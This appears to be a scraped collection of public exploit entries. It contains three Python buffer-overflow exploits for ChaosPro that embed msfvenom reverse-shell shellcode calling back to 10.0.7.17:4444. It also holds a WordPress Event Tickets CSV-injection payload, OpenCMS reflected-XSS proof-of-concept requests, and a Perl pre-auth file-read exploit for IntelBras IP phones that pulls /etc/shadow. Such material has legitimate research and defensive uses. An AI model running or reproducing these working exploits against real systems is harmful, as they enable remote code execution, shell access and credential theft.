ISHACK AI BOT

#!C:\Python27\python.exe # Title : ChaosPro 3.1 # Twitter : @securitychops # Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html # our egg! payload = "T00WT00W" # adjust the stack from 00F2FFA6 to 00F2FFA8 payload += "\x83\xC4\x02" #the payload payload += ( # msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 # LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00' "\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30" "\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32" "\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b" "\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30" "\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c" "\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39" "\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30" "\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b" "\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50" "\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30" "\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f" "\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d" "\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d" "\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35" "\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38" "\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38" "\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51" "\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51" "\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43" "\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31" "\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f" "\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59" "\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50" "\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36" "\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50" "\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53" "\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c" "\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a" "\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50" "\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35" "\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38" "\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46" "\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36" "\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53" "\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50" "\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36" "\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59" "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50" "\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47" "\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59" "\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f" "\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b" "\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f" "\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41" ) #badchars #\x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a #\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9 #\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8 #\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7 #\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6 #\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5 #\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4 #\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff # stack alignment pop_esp = "\x5c" pop_eax = "\x58" push_eax = "\x50" push_esp = "\x54" align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01" zero_eax = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01" #this needs to be a backwards jump to give us room to call stack jump code jmpback80 = "\x40\x75\x80\x75" jmpforward06 = "\x40\x75\x06\x75" #line containing our payload line_start = "Username " line_start += payload + "\n" #line with our overflow line_start += "ProjectPath " junk = line_start #the buffer starts being overwritten with # our controlled values at 522 junk += "A" * 522 #junk += alpha_numeric_hex junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06)) #- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4) # baby nopsled junk += "A" * 9 # ok, lets start working stuff here ... we have 126 bytesish ... junk += zero_eax junk += push_esp + pop_eax # push esp, pop eax junk += align_stack junk += push_eax junk += pop_esp # first section into the stack # e7 ff e4 75 # good junk += zero_eax junk += "\x2d\x89\x88\x87\x86" junk += "\x2d\x01\x8f\x77\x8f" junk += "\x2d\x01\x04\x01\x02" junk += push_eax # second section into the stack # af e7 75 af # good junk += zero_eax junk += "\x2d\x4f\x4e\x4d\x4c" junk += "\x2d\x01\x39\x8f\x02" junk += "\x2d\x01\x03\x3c\x01" junk += push_eax # third section into the stack # d7 89 57 30 # good junk += zero_eax junk += "\x2d\x8f\x8e\x74\x73" junk += "\x2d\x3e\x19\x01\x8f" junk += "\x2d\x03\x01\x01\x26" junk += push_eax # size for section one junk += "A" * ( 126 - 9 # nopsled # aligning the stack - len(zero_eax) - len(push_esp) - len(pop_eax) - len(align_stack) - len(push_eax) - len(pop_esp) # first set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) # second set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) # third set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) ) # baby nopslep just for breathing room junk += "AAAA" # First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127) junk += jmpforward06 junk += jmpback80 #Section Two # baby nopsled junk += "AAA" # fourth section into the stack part two # 30 54 b8 ec # fourth section into the stack part one junk += zero_eax junk += "\x2d\x80\x15\x75\x75" junk += "\x2d\x80\x20\x32\x35" junk += "\x2d\x14\x11\x04\x25" junk += push_eax # fifth section into the stack # 74 5a 05 3c # good junk += zero_eax junk += "\x2d\x8f\x8e\x8d\x89" junk += "\x2d\x34\x6b\x17\x01" junk += "\x2d\x01\x01\x01\x01" junk += push_eax # sixth section into the stack # 2e cd 58 53 # good junk += zero_eax junk += "\x2d\x8f\x8e\x8d\x8c" junk += "\x2d\x1d\x18\x8e\x43" junk += "\x2d\x01\x01\x17\x01" junk += push_eax # seventh section into the stack # 43 43 db 31 # good junk += zero_eax junk += "\x2d\x8f\x8e\x8d\x8c" junk += "\x2d\x3e\x7f\x2d\x2d" junk += "\x2d\x02\x17\x01\x03" junk += push_eax junk += "A" * ( 126 # amount of room before we need to jump - 3 # baby nopsled # part one of fourth set of bytes going onto the stack - len(zero_eax) # part two of fourth sec of bytes going onto the stack - 15 - len(push_eax) # fifth set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) # sixth set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) # seventh set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) - 4 # baby nopsled - len(jmpback80) ) # Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127) junk += jmpforward06 junk += jmpback80 # baby nopsled junk += "AAAA" # eighth section into the stack part two # 52 42 0f ff # good # eighth section into the stack part one junk += zero_eax junk += "\x2d\x65\x65\x75\x75" junk += "\x2d\x65\x65\x25\x25" junk += "\x2d\x37\x25\x23\x13" junk += push_eax # ninth section into the stack # ca 81 66 43 # good junk += zero_eax junk += "\x2d\x8f\x81\x7c\x7b" junk += "\x2d\x2d\x17\x01\x8f" junk += "\x2d\x01\x01\x01\x2b" junk += push_eax junk += "A" * ( 126 # amount of room before we need to jump - len(jmpback80) - 4 # baby nopsled # eighth set of bytes going onto the stack # eighth section - len(zero_eax) - 15 - len(push_eax) # ninth set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) - len(jmpforward06) ) # First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127) junk += jmpforward06 junk += jmpback80 #seh address for pop, pop and ret with a 0x00 at the end ... junk += "\x5d\x10\x40" # write the evil file with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file: the_file.write(junk)

#!C:\Python27\python.exe # Title : ChaosPro 2.0 # Twitter : @securitychops # Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html #this needs to be a backwards jump to give us room to call stack jump code jmpback80 = "\x40\x75\x80\x75" jmpforward06 = "\x40\x75\x06\x75" # our egghunter shellcode egghunter = ( "\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43" "\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec" "\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7" "\xaf\x75\xe4\xff\xe7" ) # our egg! payload = "T00WT00W" #the payload payload += ( # msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 # LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00' "\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30" "\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32" "\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b" "\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30" "\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c" "\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39" "\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30" "\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b" "\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50" "\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30" "\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f" "\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d" "\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d" "\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35" "\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38" "\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38" "\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51" "\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51" "\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43" "\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31" "\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f" "\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59" "\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50" "\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36" "\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50" "\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53" "\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c" "\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a" "\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50" "\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35" "\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38" "\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46" "\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36" "\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53" "\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50" "\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36" "\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59" "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50" "\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47" "\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59" "\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f" "\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b" "\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f" "\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41" ) #line containing our payload line_start = "Username " line_start += payload + "\n" #line with our overflow line_start += "ProjectPath " junk = line_start junk += "A" * (2705 - len(jmpforward06) - len(jmpback80) - len(egghunter)) # our egghunter ... junk += egghunter # First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127) junk += jmpforward06 junk += jmpback80 #seh address for pop, pop and ret with a 0x00 at the end ... junk += "\x50\x49\x40" # write the evil file with open('C:\\Documents and Settings\\Administrator\\My Documents\\Downloads\\cpro20\\ChaosPro.cfg', 'w') as the_file: the_file.write(junk)

#!C:\Python27\python.exe # Title : ChaosPro 2.1 # Twitter : @securitychops # Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html # our egg! payload = "T00WT00W" #the payload payload += ( # msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 # LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00' "\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30" "\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32" "\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b" "\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30" "\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c" "\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39" "\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30" "\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b" "\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50" "\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30" "\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f" "\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d" "\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d" "\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35" "\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38" "\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38" "\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51" "\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51" "\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43" "\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31" "\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f" "\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59" "\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50" "\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36" "\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50" "\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53" "\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c" "\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a" "\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50" "\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35" "\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38" "\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46" "\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36" "\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53" "\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50" "\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36" "\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59" "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50" "\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47" "\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59" "\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f" "\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b" "\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f" "\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41" ) #this needs to be a backwards jump to give us room to call stack jump code jmpbackD0 = "\x40\x75\xD0\x75" jmpforward06 = "\x40\x75\x06\x75" # 16 byte shellcode from: https://www.exploit-db.com/exploits/43773/ opencalc = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0" # our egghunter shellcode egghunter = ( "\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43" "\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec" "\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7" "\xaf\x75\xe4\xff\xe7" ) #line containing our payload line_start = "Username " line_start += payload + "\n" #line with our overflow line_start += "ProjectPath " junk = line_start junk += "A" * (2569 - 118 - len(jmpforward06) - len(jmpbackD0)) junk += "A" * (118 - len(egghunter)) # open calc junk += egghunter # First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127) junk += jmpforward06 junk += jmpbackD0 #seh address for pop, pop and ret with a 0x00 at the end ... junk += "\xab\x11\x40" # write the evil file with open('C:\\Program Files\\ChaosPro2.1\\ChaosPro.cfg', 'w') as the_file: the_file.write(junk)

# Exploit Title: WordPress Plugin Event Tickets >= 4.10.7.1 - CSV Injection # Google Dork: inurl:"\wp-content\plugins\event-tickets" # Date: 09-01-2019 # Exploit Author: MTK (http://mtk911.cf/) # Vendor Homepage: https://tri.be/ # Software Link: https://downloads.wordpress.org/plugin/event-tickets.4.10.7.1.zip # Version: Up to v4.107.1 # Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows # Software description: Event Tickets provides a simple way for visitors to RSVP or purchase tickets to your events. As a standalone plugin, it enables you to add RSVPs or tickets to posts or pages. When paired with The Events Calendar, you can add that same functionality directly to your event listings. # Technical Details & Impact: It's possible to run malicious command on logged in user computer. Even though an alert message is shown on opening the file but users usually ignore such pop-ups since file is from known source. # POC 1. Visit RSVP ticket enabled page 2. In Full name section add payload for CSV injection e.g. =cmd|'/C ping -t 127.0.0.1'!A0 3. Login into WordPress and visit event details in All Post> Ticketed > Attendees. 4. Export Attendees list (.csv format). 5. Opening the file will execute malicious payload (command) on user system # Timeline 02-08-2019 - Vulnerability discovered 02-08-2019 - Vendor contacted 02-08-2019 - Vendor responded 02-08-2019 - Detailed report shared 02-18-2019 - Contacted vendor on fixation status without any response 08-26-2019 - Full disclosure timeline given without any response 09-01-2019 - Full Disclosure

# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template # Google Dork: N/A # Date: 18/07/2019 # Exploit Author: Aetsu # Vendor Homepage: http://www.opencms.org # Software Link: https://github.com/alkacon/apollo-template # Version: 10.5.x # Tested on: 10.5.5 / 10.5.4 # CVE : CVE-2019-13234, CVE-2019-13235 1. Reflected XSS in the search engine: - Affected resource -> "q" POC: ``` https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax& ``` 2. Reflected XSS in login form: POC: The vulnerability appears when the header X-Forwarded-For is used as shown in the next request: ``` GET /login/index.html?requestedResource=&name=Editor&password=editor&action=login HTTP/1.1 Host: example.com X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja ``` Extended POCs: https://aetsu.github.io/OpenCms

#!/usr/bin/perl -w # # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read # # Todor Donev 2019 (c) <todor.donev at gmail.com> # # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl # # # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read # # ======================================================================================================== # # Author: Todor Donev 2019 (c) <todor.donev at gmail.com> # # ======================================================================================================== # # > Authorization => Basic dXNlcjp1c2Vy # # > User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC) # # > Content-Type => application/x-www-form-urlencoded # # < Accept-Ranges => bytes # # < Server => SIPPhone # # < Content-Type => text/html;charset=UTF-8 # # < Expires => -1 # # < Client-Date => Sun, 01 Sep 2019 13:37:00 GMT # # < Client-Peer => 192.168.1.1 # # < Client-Response-Num => 1 # # ======================================================================================================== # root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7::: # admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7::: # guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7::: # # # ======================================================================================================== # [test@localhost intelbras]$ # # Simple Mode: # perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#" # use strict; use v5.10; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; my $host = shift || ''; my $file = shift || '/etc/shadow'; my $user = shift || 'user'; my $pass = shift || 'user'; print " # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read # ======================================================================================================== # Author: Todor Donev 2019 (c) <todor.donev at gmail.com> "; if ($host !~ m/^http/){ print "# e.g. perl $0 https://target:port/ /etc/shadow user user # e.g. perl $0 https://target:port/ /phone/factory/user.ini user user # e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user # e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user "; exit; } my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new( protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 } ); $browser->timeout(10); $browser->agent($user_agent); my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")"; my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " "); $request->authorization_basic($user, $pass); print "# ========================================================================================================\n"; my $response = $browser->request($request); say "# > $_ => ", $request->header($_) for $request->header_field_names; say "# < $_ => ", $response->header($_) for $response->header_field_names; print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401'); print "# ========================================================================================================\n"; if ($response->content =~ m/$file/g){ my $content = $response->content; $content =~ s/$file//g; $content =~ s/^\n+//; print $content; print "\n# ========================================================================================================\n"; exit; } else { print "# Exploit failed or full path is wrong..\n"; exit; }

